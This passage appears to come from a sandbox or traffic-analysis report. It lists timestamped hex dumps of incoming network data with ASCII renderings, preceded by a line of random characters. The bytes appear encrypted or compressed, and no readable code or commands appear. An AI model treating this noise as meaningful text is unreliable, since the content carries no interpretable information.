w}MnIR8d/\N#>kIlYIE[zEG`YA[HvZYs'Y<p"9"}BDot8`C_@9;u6#/:Sc{wBZ'eHB\|A+9obEf1 (kRh;{K#3n/Ix"mn7
2023-10-13 13:21:17 UTC	11150	IN	Data Raw: 42 9a 59 6b 14 8d 42 d6 ce 57 54 87 8a 0f d6 9c 7f c1 21 65 30 a3 b4 95 51 5e c6 18 70 bb 2f ab a3 d5 34 a6 79 4d 8a 76 84 aa d7 f8 2c 48 17 5b cf 3f ee ac 13 a2 8b 3e 4c 98 51 98 54 32 17 d9 43 cf fb 75 78 97 ab d2 16 fa f3 38 e4 89 8c 49 e2 af 82 a8 25 0e 2d b3 3a 2d ce 34 49 63 6a d3 5c 8d 82 0d f2 e2 9e f0 0d 6b ad 95 6e e7 e3 9f 28 b7 f7 1e 65 e2 09 98 9c 60 e0 ca e6 49 1e 37 11 bc 47 f5 aa 3c 17 ad 98 c2 cd 43 35 ce 4e 0c 06 14 9b c6 0e 6e 64 83 94 98 03 f8 9e 3f f5 8f 67 64 ca bf 5e 89 b9 bf 52 e7 73 e7 4e ad de 0d a8 49 08 17 56 3f 19 a1 e7 41 7b ef 53 53 06 b6 b5 f9 65 70 8f 55 7a 16 e0 c9 63 7d 9b e4 8e 2a 6b c3 25 ec 60 be fa f2 61 d5 7c 4c 1a de 4f 18 ec 43 e4 c4 62 cf fe cd bb db 44 9f 54 fd 29 82 6e 64 89 dc 1b 7a 4a 13 04 7b d4 51 94 66 cf Data Ascii: BYkBWT!e0Q^p/4yMv,H[?>LQT2Cux8I%-:-4Icj\kn(e`I7G<C5Nnd?gd^RsNIV?A{SSepUzc}*k%`a\|LOCbDT)ndzJ{Qf
2023-10-13 13:21:17 UTC	11166	IN	Data Raw: 55 c1 ea 3e 9c 98 79 37 71 49 06 0b 28 f0 34 31 ce b9 a2 62 b8 1e 59 1c 1d d3 18 68 e3 dd ee 40 df 27 5b 41 e0 63 c3 34 77 03 3f 91 6a 56 e9 1b c5 91 35 b7 f4 e6 68 04 ef 83 5f 14 78 b1 3b 8d b6 be 6d 90 c8 f5 de ed 67 34 14 ba c9 17 dd 8c d2 f8 46 98 37 0e b2 df 4f b0 98 34 4c 82 2c 67 f9 16 7f ce 23 b4 17 57 cf d7 64 2e 57 41 be 95 fe d5 f1 ed ba fc 6b 8b f9 b9 85 d2 7b 82 b8 3e a5 9c 47 e9 26 7a 2e 30 42 ed 30 e4 06 e3 23 10 77 49 28 3a 1a 59 ce f4 2b 85 b8 4b 52 34 b1 bf b6 97 aa 1c 07 91 10 33 07 f6 a6 ed e5 17 87 5a 47 96 d1 9f c1 12 63 ed 0d 0f e2 1c 39 2e 0f 72 a0 21 99 45 b9 01 08 8f 16 8f 0f 0c 57 3e fe da c5 6b 2f 88 11 d7 bc 7c 52 3d 26 54 05 95 de 18 a9 cd 84 c3 3f c1 6d 67 eb cc 38 00 b8 c9 0c 1c ff 69 0c 32 75 3d 63 03 55 4a c8 e9 b5 9d b6 Data Ascii: U>y7qI(41bYh@'[Ac4w?jV5h_x;mg4F7O4L,g#Wd.WAk{>G&z.0B0#wI(:Y+KR43ZGc9.r!EW>k/\|R=&T?mg8i2u=cUJ
2023-10-13 13:21:17 UTC	11182	IN	Data Raw: a8 e7 98 24 0f 69 01 a1 0e bf 69 2e 8d 4d 7d a7 b4 fb 73 84 59 19 87 bc 31 17 a1 d4 e1 0c 16 36 db 91 70 3b 37 23 47 6c 1e e7 62 38 5a 40 14 0d 79 91 8a 4a 95 6f 2a 68 30 92 1d fa 70 96 f7 bb 84 2d 33 92 c6 43 07 c0 96 b5 a8 66 9b f6 57 98 1e 42 18 ca 42 77 b9 d4 22 9e 5f a9 51 23 b6 c1 7f 35 44 24 2e a6 2b 1b a6 e9 ee 1f 52 e7 12 8d b8 8c 9c ba 2c 6c b3 81 13 b0 04 58 a6 66 5d 22 0c 00 fd 81 32 11 90 b1 12 96 54 34 c6 07 53 10 12 e2 84 c1 d4 77 d0 75 5f 1f 75 8b f5 65 30 ec 10 1a 4b 56 07 3f 8a a7 9a 25 5e fa 30 a0 52 75 e6 53 e1 51 ea a0 4b 8c 8c a0 f0 0f 6c 94 8a 79 04 57 fd f0 1b 29 1a 09 06 88 f9 c6 59 04 93 06 b0 d6 24 5f e0 94 72 4b 9e 4c b8 d9 d5 ad 46 b9 c0 cf 10 df 23 e3 f7 e3 67 02 8b e2 19 9e 69 5d 91 3a 30 b9 3b 59 57 6d e4 ea 11 e4 e8 9e 61 Data Ascii: $ii.M}sY16p;7#Glb8Z@yJo*h0p-3CfWBBw"_Q#5D$.+R,lXf]"2T4Swu_ue0KV?%^0RuSQKlyW)Y$_rKLF#gi]:0;YWma
2023-10-13 13:21:17 UTC	11198	IN	Data Raw: 0e 61 e8 6d 84 fc 45 51 26 4e 4a a5 34 41 df 6b 34 26 dc 9b 52 5d 03 d8 a2 e0 f1 ee fa 31 f2 75 0e 7a ca 4e 2b a6 21 90 14 d5 61 be 66 0d 40 4d c6 44 d0 b2 49 4e c8 62 0f 0b 88 fd 46 8f df d5 30 20 bd a5 40 ec 68 d8 e9 54 a7 4b 74 9e 63 2c d1 12 02 66 b8 f1 41 d4 b0 43 1d 14 b8 91 1c c1 fa c7 7c 0a f5 b6 1b a4 b4 51 f5 f1 b0 20 ce a7 ff 02 b1 bc 09 42 52 4f ee a3 f5 8c 39 b1 8d be ee 77 e1 7b af da e0 3d a7 e6 03 df 0f fa 11 f4 44 15 70 76 21 e4 77 d1 f6 c2 37 2e 6e a7 2e 40 18 31 b3 45 01 c8 59 96 66 98 db 3f fc cb 6b 3f 97 ce 7d 6b 77 a4 b7 5f 86 2c 31 cd e9 98 24 db c7 f9 dd 54 c7 87 1e a8 ce 7c 76 47 c3 53 ea ba 8f d3 00 2e 08 ee 5d fe e2 a9 77 38 7d 76 1d 7c 5e 48 76 e6 5e d1 50 a7 c5 48 ce 9c a3 a1 fd e1 0c 9b c8 83 55 74 49 18 17 ed 1d 80 40 8d 6f Data Ascii: amEQ&NJ4Ak4&R]1uzN+!af@MDINbF0 @hTKtc,fAC\|Q BRO9w{=Dpv!w7.n.@1EYf?k?}kw_,1$T\|vGS.]w8}v\|^Hv^PHUtI@o
2023-10-13 13:21:17 UTC	11214	IN	Data Raw: 54 1f 61 70 20 44 b8 11 02 4b 0e 1b 76 8c 6e 9a 1f ff f5 25 c6 df ba f6 1e 21 51 74 28 33 a6 71 8a 44 db e8 cc 3a 39 37 8d 83 54 e5 c2 8e 35 b5 43 d1 41 08 81 75 22 8e 25 3d d6 af 98 8e 0a 20 2f f1 34 87 f6 45 c9 34 d3 89 06 b3 9c a9 4c f4 0c 5c cf ba c3 10 3e c1 e5 44 12 e2 90 0a dd 08 18 d6 0d 35 dd a8 e3 c2 bb c2 dd 9f 7e ae 67 a4 8d d2 e0 95 99 89 76 81 c1 90 bb 9c 28 e6 d9 78 0f fa 11 2e 17 92 d0 95 58 a6 83 6b f9 0b a7 7e f0 77 82 b5 6c fb 60 09 fb d9 9e 20 93 71 23 be 71 41 1f b6 73 eb 1d f2 f0 4d bc b8 af be 11 af 20 c0 0b 36 48 3e 27 4c 70 4d e2 01 53 dc b3 21 a4 b1 d5 6d 78 64 f7 2e 1f db 05 05 e3 89 f6 82 92 11 04 38 30 61 0c 58 4f e7 0f 98 e0 cf 88 e0 4e 50 92 85 93 57 f1 ae 4e da 56 d5 b4 46 c3 0f f0 7f b7 ad 19 b7 31 78 4b 9f 96 9b a3 dc 5b Data Ascii: Tap DKvn%!Qt(3qD:97T5CAu"%= /4E4L\>D5~gv(x.Xk~wl` q#qAsM 6H>'LpMS!mxd.80aXONPWNVF1xK[
2023-10-13 13:21:17 UTC	11230	IN	Data Raw: a1 04 0d 99 07 d1 19 cb cd c7 1a 79 0d ae 4b e8 7a fd f4 3a cc f3 18 21 7c b3 a7 1b 7a e5 16 25 2e d8 c7 ae d1 b4 88 c8 35 ff 71 27 e4 b5 81 c2 cd 7d bc 3a 01 1a 4f be be 19 4d ba 92 c9 1c 45 70 19 e3 b7 cf b2 c3 d6 e6 d9 c1 ee dc 9e 35 a9 db 58 20 59 c6 6a 23 04 c4 c6 41 e2 63 e9 f0 0e d8 5d e5 8f 72 1d 53 bd ce 11 b8 ba bf eb 35 1d 04 a1 3e cd 0a e8 02 73 86 27 44 e5 05 ec 1c 34 ba b8 61 48 34 5e f1 40 90 76 59 52 ae af 71 6c ee a4 2e 6c 5b 11 93 2a 10 bb 16 5b 42 c1 53 40 ab 8f 1c 3b 13 77 72 db 0c 32 40 f4 71 5b 58 c2 75 cd ba f4 cc 2a a0 54 a6 e5 71 97 2d 45 5c 88 56 82 c6 a8 3c 23 e8 6a 30 4b c9 6d d3 62 97 b7 d5 d6 3e 3e 03 a8 b0 09 3c ef e7 b7 6e 68 0a ae 34 05 13 cf 04 16 ec 53 00 5e 16 0d d1 c0 1a ed d7 90 08 d7 56 89 6e 0e a8 34 d0 22 82 7d b0 Data Ascii: yKz:!\|z%.5q'}:OMEp5X Yj#Ac]rS5>s'D4aH4^@vYRql.l[[BS@;wr2@q[XuTq-E\V<#j0Kmb>><nh4S^Vn4"}
2023-10-13 13:21:17 UTC	11246	IN	Data Raw: 73 14 da dd 01 63 92 bd 3c b7 d1 03 1a 8b 7b 1a ad e1 43 14 0c 7b f6 f0 9a fd 72 57 c0 d4 fb 50 45 f5 0c c0 5a e9 e5 17 cd ae ec 87 d1 e2 94 81 60 e3 9e 3a 54 ad cc 48 2a 32 65 42 a3 f1 17 03 af b0 2b cd 32 6c fe 60 ab 29 ab e5 9a 1c 79 83 30 b1 2e c3 3e 32 41 07 00 11 6b 73 c5 ae b4 b8 f3 7e b5 b2 46 c3 21 f4 37 63 16 e3 5a 41 6a f6 1e 3c 76 72 5b 46 de 16 1b 7b 52 c9 06 4f dc e6 50 19 6f 85 49 5f 16 48 24 c3 d7 26 4c 54 ce c2 d0 70 d4 cb 05 64 24 31 44 96 1a 30 69 ea 86 a2 cd 8a 8b c4 da 67 ad 85 d3 94 0f e9 22 77 cd 26 14 e9 96 ae 4a d0 e8 07 48 bc bf 74 52 8f 59 95 78 8c 6e d7 d3 a9 a2 17 61 21 27 9f 97 b6 df 27 30 35 f0 d4 f2 a3 53 89 20 89 a4 cb 23 4f 29 5f e5 df a2 d2 b8 fc b3 58 dc 71 73 fc fe e8 62 a9 6d aa e8 8f 84 ee cc 9e 20 1d e4 8d 92 03 62 Data Ascii: sc<{C{rWPEZ`:TH*2eB+2l`)y0.>2Aks~F!7cZAj<vr[F{ROPoI_H$&LTpd$1D0ig"w&JHtRYxna!''05S #O)_Xqsbm b
2023-10-13 13:21:17 UTC	11262	IN	Data Raw: 31 4f cc af de eb b8 bb 01 0f 51 50 df 77 2c 1b 4c a7 90 8c 0a ee 1a c8 0c 45 08 03 55 0a 5a e0 17 6f 90 96 e2 92 30 f2 f0 6f a8 16 d0 f9 d4 16 7d 4f 78 93 ab 8c 45 94 3f b9 63 84 bf b5 a1 fb 7f a1 ba c2 39 d3 af 9e 8f 0d ad a1 86 5b b5 c2 39 c7 ab 26 06 f6 d6 47 b4 cf 8b f8 e8 66 1f 75 d0 af 74 7a be 52 4d 2f d7 eb 24 80 0c f4 62 69 38 96 40 17 d2 68 c1 63 f6 0b 6c bb 69 9b c8 2d 4c 1d 67 7b ff 8b af b2 de c0 5f ad a8 68 06 58 1f d2 86 2c a3 e2 85 e6 3a 66 e3 39 05 81 f3 cd 75 95 07 d8 30 bd 64 d9 b6 33 f3 89 75 9a b0 28 fa fd 4b 18 e1 d2 c8 19 3b 2c 55 2c 69 57 7b 9b 09 ce 68 c2 5d 5a e7 eb a0 14 ed f7 8b 8f 5d 79 f1 9d 2e 19 e6 b5 63 3b 6d 8a 4c 73 bf 92 8c de 9d 0e ad fe b4 8f f7 26 13 89 30 68 cd ce 09 fc 3c 8d 36 75 49 20 49 63 01 d1 5d f6 3c 2f 7e Data Ascii: 1OQPw,LEUZo0o}OxE?c9[9&GfutzRM/$bi8@hcli-Lg{_hX,:f9u0d3u(K;,U,iW{h]Z]y.c;mLs&0h<6uI Ic]</~
2023-10-13 13:21:17 UTC	11278	IN	Data Raw: 51 39 a4 23 a6 fe b5 3a d0 e3 3f a6 19 0f 69 76 e0 89 93 13 03 c9 2b c5 1f df f7 8e bb eb 1e a6 a4 38 2e d6 7e 7a 57 a4 1c cd 77 55 54 16 94 13 9c 46 81 f6 7b 1b af f2 76 44 bf 22 a7 b5 a0 ec fc 05 12 38 8d 2c 01 f3 ef 8a a0 ac 37 69 8e d7 3d df b8 e8 20 89 61 a0 a5 fa 05 8b d7 84 32 e5 ff 23 71 26 75 13 be 0e e1 ab f7 e8 1e 14 0b dd 2d e1 15 a3 ee 0f 8d b6 a6 a6 24 e4 81 a3 88 2b 6e 0a 4a d0 86 99 44 8b 94 cc 49 d7 4b c7 ea a8 ae 94 ce 1d f3 e8 66 c1 e7 2c b6 ea aa 78 90 99 5a 24 b6 69 11 d4 f9 d0 b4 85 7c 15 8b 91 3d d2 6c 08 ad 7c 96 be b0 f7 a0 ff 7f f2 e0 42 7c 6b c3 fa 42 4a f0 70 fc f7 40 16 8e ac 0f c5 54 09 9e c3 eb b0 95 9f 86 ee 32 bb fd 1a 2a ff 82 31 6b 96 a4 9f 58 23 f4 0a 2a f6 80 25 e1 23 9e 55 b8 1b 27 57 1a 5c 63 91 b7 f7 92 89 fb 56 10 Data Ascii: Q9#:?iv+8.~zWwUTF{vD"8,7i= a2#q&u-$+nJDIKf,xZ$i\|=l\|B\|kBJp@T21kX#%#U'W\cV
2023-10-13 13:21:17 UTC	11294	IN	Data Raw: 5c 55 e7 63 b0 73 37 40 f5 77 ea 00 47 6a 80 69 29 9c 65 3e 57 9a 8d 77 f8 f1 f4 7c 63 e8 e6 7b ff 38 44 c5 66 61 85 bb 5c 91 56 d7 ab 10 b6 a2 36 1f 85 b0 e1 b9 83 b0 5b e9 9c 73 29 55 50 48 77 a0 2b f6 cd 50 59 f4 d8 b3 c5 39 67 ab 87 be 1e 91 d3 cc 71 eb 05 98 7a 4d 82 4f 7f 36 5c bb 68 9d c0 21 8a 25 5c 75 64 b6 71 51 f8 97 a4 a0 b2 ff cf 8c ca 69 f1 3d 5d ca a5 90 a5 37 cf be d5 17 eb 9a 9b 88 9e af 44 03 ab 9f c9 4a 53 95 a4 43 86 05 13 88 bd aa 7b cf ea 25 87 fc cd c8 d5 4b c0 d3 5b 0b ef 26 c3 75 22 5e 94 d2 95 f7 e1 20 7a fa c7 db 71 af 78 78 45 ea 01 bc d8 35 60 57 07 eb 53 35 92 10 5e ff 7f ff 61 1a 89 b0 21 62 f7 65 44 0a a9 93 6c c4 9c 21 ce 6d aa 3f f0 44 14 b2 65 88 15 72 70 2e 66 f8 ec c5 7c 83 26 62 3c 21 e6 0b 2e 46 3c 9d 27 5b d5 e4 51 Data Ascii: \Ucs7@wGji)e>Ww\|c{8Dfa\V6[s)UPHw+PY9gqzMO6\h!%\udqQi=]7DJSC{%K[&u"^ zqxxE5`WS5^a!beDl!m?Derp.f\|&b<!.F<'[Q
2023-10-13 13:21:17 UTC	11310	IN	Data Raw: 63 9a e6 4a 18 77 12 73 fe 38 d2 f7 14 d6 c5 20 b3 9c bb 8c d8 27 56 7e 62 f0 90 5a a9 77 73 79 6c ac 21 ad ae d0 9d 1d 53 f0 b9 6c ed e7 56 e5 79 bc be a5 15 b0 79 ba 06 a7 30 31 b0 b9 ac 80 ba 3f 42 07 70 ae 37 d6 a6 f5 3c 72 ac 6b 83 4f 99 6d 78 1c 34 96 b4 18 d4 0d b8 9a eb 13 bb a5 8f 84 5c 3b 55 17 44 f0 47 bb 68 9e f5 cb 3c d2 74 6d 08 c2 75 10 c5 fc 25 f2 a2 76 bd 60 d0 ac 6e ec c4 52 9e 54 52 d9 86 fb a3 7c ae 91 fb f8 70 8b 18 91 4d 87 2a 71 e9 ec 36 d4 9d 35 d6 0e 41 44 d0 e8 60 50 32 5a 05 ca 53 45 04 03 39 c2 22 22 48 12 e5 2f bb fc 26 de 02 e1 f5 c1 cf ac e1 a2 af 0d 32 19 c9 dc a1 6d 94 e7 ca e3 e1 a5 42 d9 8a d3 ae 11 cf 8e 91 f2 b6 a4 9a e9 3d b9 7c 10 31 dd f8 52 c1 a8 1a 33 ee 87 7c 8c a5 37 ec 91 f9 36 d5 6a 26 d5 95 34 78 be 93 d9 2e Data Ascii: cJws8 'V~bZwsyl!SlVyy01?Bp7<rkOmx4\;UDGh<tmu%v`nRTR\|pM*q65AD`P2ZSE9""H/&2mB=\|1R3\|76j&4x.
2023-10-13 13:21:17 UTC	11326	IN	Data Raw: 8d a9 91 37 91 57 f9 6a 3a 98 aa df 1a 8d 7e c4 52 39 9e d9 d7 3f fa fe 1e dd 11 2e d7 d2 8f 0b ae f9 15 7c 6b 99 d7 ec 5f 59 ff 03 54 95 8f 84 b4 3a 13 1e a1 e2 de 64 c1 24 38 da ff 6a 47 47 6b 6a 0a c0 05 3f 3a c5 45 50 b7 9a 2a 81 8d ff 6a cb 92 c4 4b 36 5a 94 db d5 c1 90 11 63 d7 0b 46 21 32 7a f1 a6 9e 79 67 08 93 e6 7e b3 f8 ac d6 1c 02 2f 10 e0 1b 73 b2 5a 53 26 cb 2d 71 03 49 1f 1e 26 54 5e 52 ec c0 0a 2c fb 0b 90 15 e5 25 04 5f cb 4c 63 9b e5 fd 7a dd ae 6c 63 43 40 5a 0b c5 9e 28 e4 b1 34 ae e4 e8 80 74 05 1f 05 ba ff c2 a3 f6 e9 00 7f 3a 3a 65 16 9c 14 37 61 17 57 36 be bc 14 56 35 5c 20 ce b9 6b 21 16 49 6e e0 f0 90 e3 9f 13 4a 44 f4 e9 b4 c6 fd a0 ae fd b8 d6 51 85 c8 e5 c8 11 73 61 e3 81 61 ac 48 f1 c9 e4 d5 8f 32 41 36 e4 d2 3b c3 f9 13 d6 Data Ascii: 7Wj:~R9?.\|k_YT:d$8jGGkj?:EP*jK6ZcF!2zyg~/sZS&-qI&T^R,%_LczlcC@Z(4t::e7aW6V5\ k!InJDQsaaH2A6;
2023-10-13 13:21:17 UTC	11342	IN	Data Raw: 9a 1e c7 f7 01 8e 84 a5 4a c6 0e 52 dc 47 41 b0 65 7a 40 b3 2c 3b ca f8 ba f4 c9 54 aa f0 f8 ed 30 99 77 38 2f c6 32 fa 6e e9 83 04 1a b1 38 4d d1 1c 2d a3 0a 29 9c 2f 65 c4 53 26 8f 88 57 ed 72 dc 85 14 23 48 c4 f0 4e 5e b1 ec 24 b7 5f fb 60 e3 d6 e5 0b db 35 78 f1 6d 4c 31 99 c9 1a 1b b1 e5 0f 05 7a 6e c5 f6 76 14 12 78 62 d0 ad ad f5 21 74 2e 8c d8 a7 68 fe 42 85 32 f1 22 f5 9f 97 c4 18 d9 aa fa 1d 54 6d b5 4e 12 ed f9 5f 10 4f c5 24 a9 06 15 67 db 6f de 2c 83 5a 4f 56 9c 80 d3 6f 13 c2 70 61 a4 3a 89 86 81 1c 71 f6 7a 8e 6b 34 9d d7 32 7c 18 18 66 2c b3 b9 af c6 ae 1b 1d 37 c7 7a db 4a 24 06 74 43 3d e3 c1 bd 51 ab d6 63 be 61 ae 29 aa 77 b2 69 f8 2b 05 a6 aa 71 a1 b4 49 9e 1f 0a 23 26 69 57 69 e1 20 16 04 39 1c f9 0b ec ab 59 d1 a1 86 88 27 8d e0 d6 Data Ascii: JRGAez@,;T0w8/2n8M-)/eS&Wr#HN^$_`5xmL1znvxb!t.hB2"TmN_O$go,ZOVopa:qzk42\|f,7zJ$tC=Qca)wi+qI#&iWi 9Y'
2023-10-13 13:21:17 UTC	11358	IN	Data Raw: 56 22 e9 63 fc 86 71 84 86 0f b8 ea 49 a4 83 e5 d4 a2 19 34 56 45 c2 3a e4 55 44 d9 b6 b5 78 50 97 d3 96 0d 2d ba 5c af 6d 1e f2 cf 60 93 0b bd 22 06 02 25 68 4a 9e 92 fc ac e6 1a 7e e0 e7 dd ee cc 41 15 c7 86 ab d7 7b dc a7 3d 48 2e 23 9a 11 5f 51 42 c2 f6 e7 d7 80 c3 3e ef 80 a2 97 9e ff 4f 00 85 bd d4 40 19 3a 44 f8 e9 ad 43 b0 7d be 42 b5 d3 f8 f8 a7 26 53 f9 83 d9 37 e6 5c a7 39 73 f8 a6 4f 0f 27 ea b5 85 01 55 2c 77 ee ec 18 4b d0 0f c6 79 2a 84 1b 90 e6 f1 18 04 c8 05 bf 86 44 f5 dd 5c ce fe ba 56 f9 bb a0 dc e4 ba 4a 45 3a a5 d6 24 dd b3 8d b3 92 0f 8d 11 b7 5e 53 0c de 2c dd 2b ef 97 eb 18 b4 b8 00 f9 88 06 4c aa c2 db be d2 77 13 54 d9 f5 b6 77 4f 7e e5 86 05 3b 4f ca a3 80 34 c5 16 b1 de 74 1b 6c a3 6a 6f 32 70 fc 2f 7a 8d c9 1c d1 fe 40 d4 5c Data Ascii: V"cqI4VE:UDxP-\m`"%hJ~A{=H.#_QB>O@:DC}B&S7\9sO'U,wKy*D\VJE:$^S,+LwTwO~;O4tljo2p/z@\
2023-10-13 13:21:17 UTC	11374	IN	Data Raw: 28 d6 79 17 e2 65 b2 f9 f1 47 d1 4d 9b 10 5d 6d a7 d5 92 e1 4c a5 a2 11 06 26 72 6b 44 4e 0a ad 39 b7 4c 4d 59 e2 db b5 45 0c 2c ac fe 8a 6d 8b b1 29 9b da 2e 90 2e d2 cb dc d1 41 20 fc e2 34 10 c8 f3 11 c4 f5 cf 5b 1f 3c 45 58 13 7c 40 f8 f0 78 5e bc 22 97 2c d6 c7 80 00 f6 53 a9 0f 84 af 17 67 14 e6 60 da 93 32 6d a0 cf 62 5c df 98 3a 09 88 4c a0 a0 5f 46 de d7 ba 75 f9 93 fe 05 c0 9f cb e3 38 f3 10 ba a5 78 e5 4d 61 c2 be 6c 95 75 a7 6c 3f 38 68 92 fb da f9 ad 26 90 7c 30 93 9e 2a ff ab f5 62 73 1d 04 d3 30 a3 79 bc f8 de 0b c2 e7 35 79 e7 a4 3e 64 0d 5f 50 18 b4 d3 78 26 58 34 f2 6f aa 97 58 03 3d 22 8a 07 e3 b4 44 00 58 e3 63 c0 82 48 84 ac db ab f9 cb 6d 12 c9 88 87 8f 08 11 33 aa 53 2a fd 62 4a 97 83 0a 5e db 64 df d2 7f 9f bc fa 46 65 c3 ed 04 8a Data Ascii: (yeGM]mL&rkDN9LMYE,m)..A 4[<EX\|@x^",Sg`2mb\:L_Fu8xMalul?8h&\|0bs0y5y>d_Px&X4oX="DXcHm3SbJ^dFe
2023-10-13 13:21:17 UTC	11390	IN	Data Raw: 9d 6d 74 02 90 78 a8 ad 27 43 c5 e9 c9 d0 5f 95 b0 e8 d0 63 73 af 07 3f 71 8d a8 15 d8 a0 41 90 a4 70 41 13 71 bc 76 75 f1 24 02 98 d6 01 7f ce c2 bb d5 4d d2 e5 5e b2 61 86 f2 70 b0 ce 18 fc 1b 68 20 05 49 4c 3e 91 ba df d6 bb 8c c9 12 e6 8d dc ea c3 32 06 c8 b8 06 a9 e5 61 d3 7d b6 27 97 8a f1 a5 48 48 11 e8 a0 54 ed 9e 9a 02 24 df a3 44 fd 9e 46 d4 92 b4 65 82 16 cc a9 a0 f9 8b 29 70 de 12 6f 9f f1 ff fa 8f 67 18 9a 26 75 0c 60 7d d4 70 07 55 a0 56 3a 53 15 26 b2 7f b8 c4 e7 5c 8e 21 46 e4 87 46 2c a9 89 ed bc ec 84 3f 22 32 01 47 b0 1d 0f 36 77 c5 6f 31 c4 a3 9c a5 70 ad c7 47 4b 2b d4 64 36 c5 cb 72 ba 35 20 fd 64 79 fe 5d 4d d6 fa 37 ad 4d 3f ef b7 f3 cd ad f4 6b a7 7d 4f de 16 42 11 45 6c 06 15 42 6f 13 5f 38 75 86 fa f5 88 ea 17 7f e7 70 33 0a 2b Data Ascii: mtx'C_cs?qApAqvu$M^aph IL>2a}'HHT$DFe)pog&u`}pUV:S&\!FF,?"2G6wo1pGK+d6r5 dy]M7M?k}OBElBo_8up3+
2023-10-13 13:21:17 UTC	11406	IN	Data Raw: c8 f9 4d 6b fc 46 41 32 af 6c df 7e e4 94 c0 db 57 77 d3 03 50 ed 54 fd 39 2a ca 41 b1 cf 4d e1 42 81 10 b2 07 4e 28 a5 99 f6 2b 07 c2 4a fe e0 6d de 6f 52 88 d1 da 9b cf c5 97 b0 3b d1 b6 56 78 44 bb d1 5b 8a 60 9c 50 8c 79 f4 cb d9 e7 88 cb fe d8 c7 b3 87 6e 44 f3 d3 a1 b1 dc 3c c2 2f 73 54 fe a2 22 e7 fa 62 3a 01 2d ec 63 28 02 99 45 08 05 35 4f e2 bc 44 7a 67 95 64 1f d6 db 53 b0 42 8b d7 c0 83 d5 1c 1f 45 99 b3 2b 97 e8 6c 57 04 21 36 03 8b f3 8b 3c 3e e1 85 46 23 e6 b9 2b b0 d9 87 40 e9 77 5f b5 3d 13 9c 3c 32 da 07 c1 02 37 1c c8 1f 03 17 23 f8 e9 a3 8c f3 55 66 f0 b0 24 e0 8d 9e d5 54 56 de e4 61 26 af be d7 70 fd 05 98 4d f2 7f bf f9 f4 0d 53 ea 11 63 1a 83 79 ec d8 a9 89 3c 91 78 8d b5 1b 6b af 1d fe ba 1d 36 00 3e 22 50 c8 e4 d8 4f a9 78 80 fb Data Ascii: MkFA2l~WwPT9*AMBN(+JmoR;VxD[`PynD</sT"b:-c(E5ODzgdSBE+lW!6<>F#+@w_=<27#Uf$TVa&pMScy<xk6>"POx
2023-10-13 13:21:17 UTC	11422	IN	Data Raw: 11 0f a3 19 85 a9 af 8c 33 db 22 ab 95 25 1b 2a c5 20 4a cd 34 d1 55 0d 67 e4 d3 1e ad 73 c5 5e fc ae 99 29 65 59 07 86 28 1c ea ab 94 81 d8 3f b7 a0 d4 f6 c5 9f e7 79 62 f1 c4 e0 86 bf 16 6f cb e5 a5 54 e6 1d 0c 85 4e 17 4e 7d b0 74 01 80 8b e1 7c 5b f7 81 bd bc 6d 1e 73 0a 2e 31 c4 a1 d5 42 42 67 af 28 67 ca 81 f5 eb 1f b2 03 c8 cd 90 d0 3b dc 48 ce c2 24 ac 65 a5 10 90 a8 83 f7 d4 39 7d fc d6 f6 89 42 9a 6f 65 85 44 df ac 3d a6 de ab 9d 1b f4 ee cf 64 25 16 6b 51 29 a3 80 60 f7 8e 08 29 ee f4 59 67 d9 ff 9c d2 0d 08 df 59 a2 34 57 bf a6 b1 68 71 5a 48 25 9d 16 ae 13 8f d6 cf ab 5c fb 3b 14 f3 cb 0b 19 89 c0 7f 93 b6 3b 03 14 83 cd 3f 01 17 f8 9d 0f 5a a3 2d 79 4d 9e 34 e4 2c ff eb 18 51 3a 48 01 39 3d 9b 1a 1a d6 41 06 d1 90 0b c2 db 5b dc 88 77 bd 15 Data Ascii: 3"%* J4Ugs^)eY(?yboTNN}t\|[ms.1BBg(g;H$e9}BoeD=d%kQ)`)YgY4WhqZH%\;;?Z-yM4,Q:H9=A[w
2023-10-13 13:21:17 UTC	11438	IN	Data Raw: 13 b0 e2 45 71 ad 62 b6 ce 5c 92 c6 40 21 50 55 84 52 95 b5 15 6e d3 b4 93 bd dc 3c 7a c9 3d 76 28 c8 95 43 a8 94 6d 89 76 60 84 52 a4 eb e5 eb 98 aa 54 5d ae a3 d7 5c 15 a6 49 fd 40 1a 2e e0 dd 1e bb a2 3d 64 43 cf 9b 82 d5 95 98 25 a9 50 aa a3 41 c2 28 40 f2 17 d2 f6 0e a8 14 da ca 34 d4 65 19 77 44 24 95 82 67 51 40 2e f7 9e 1e b7 af d4 a3 95 da a6 2f 44 f3 17 e0 05 7d aa d8 1b 65 22 ab db 06 22 55 a7 49 19 89 a7 ee 21 4e 86 40 ed 96 19 e7 fe 46 d0 3e f8 06 b0 b9 85 be 47 68 4f 3f 91 8c 54 40 26 c5 df e3 a1 76 73 f7 50 5d 0f 64 b9 db ab 18 b8 a7 17 75 55 75 6b 9a e2 d0 2c e6 c3 3c a9 4b dd f6 d1 0d 96 49 0d 1c c0 54 44 72 a9 13 51 dd a8 2f 31 61 1d 3a ba 9b be 60 cc cd 6c 44 5f 2b 25 33 a7 b2 4f 63 54 fc 00 cc 54 cc 3c e5 53 1a 0f 13 7f 37 b9 02 44 83 Data Ascii: Eqb\@!PURn<z=v(Cmv`RT]\I@.=dC%PA(@4ewD$gQ@./D}e""UI!N@F>GhO?T@&vsP]duUuk,<KITDrQ/1a:`lD_+%3OcTT<S7D
2023-10-13 13:21:17 UTC	11454	IN	Data Raw: e5 cd 70 4a d6 a4 b2 62 58 c6 38 f7 85 98 31 ab 67 ac 74 46 1a 7b 09 c6 42 14 42 c3 40 dc 26 41 43 0e 04 89 79 cd 95 97 5c 5d 5b 13 e5 e9 3e de 1f c0 65 0c 4d 30 6d 34 e3 5b 5e 5c 0b 8c ef 4e af 37 ec 7b 9f f0 07 81 ac fe ff 7a 5b 3a 06 0d 44 a9 25 6f 7b 48 79 66 2d db 61 80 48 2a 37 a5 85 74 aa 65 a4 8a 8e f5 6d 9e 0e 17 52 11 75 5a 95 d8 8e 24 8d a1 0e 35 d7 75 16 98 80 48 83 00 78 55 38 ee 45 b0 39 c3 17 5b 6d 3f ab 05 3a 99 fa 4e bf 14 cb b2 9f b3 07 4b a4 39 ae 98 71 84 03 a7 1f c2 0a 34 99 de da 5b 7a f5 f5 a9 7e b9 da f6 41 8a 35 4a de 94 1d 05 9f 6d 99 81 6f fc b4 5e 76 e3 24 de 36 da 71 ae 75 14 63 a5 eb 78 5a 62 f1 12 b3 fa b8 cd 1f 96 c6 f8 cf 67 c2 22 f3 d5 47 77 43 6a 5b d7 37 05 45 d8 d0 18 c8 17 ef 44 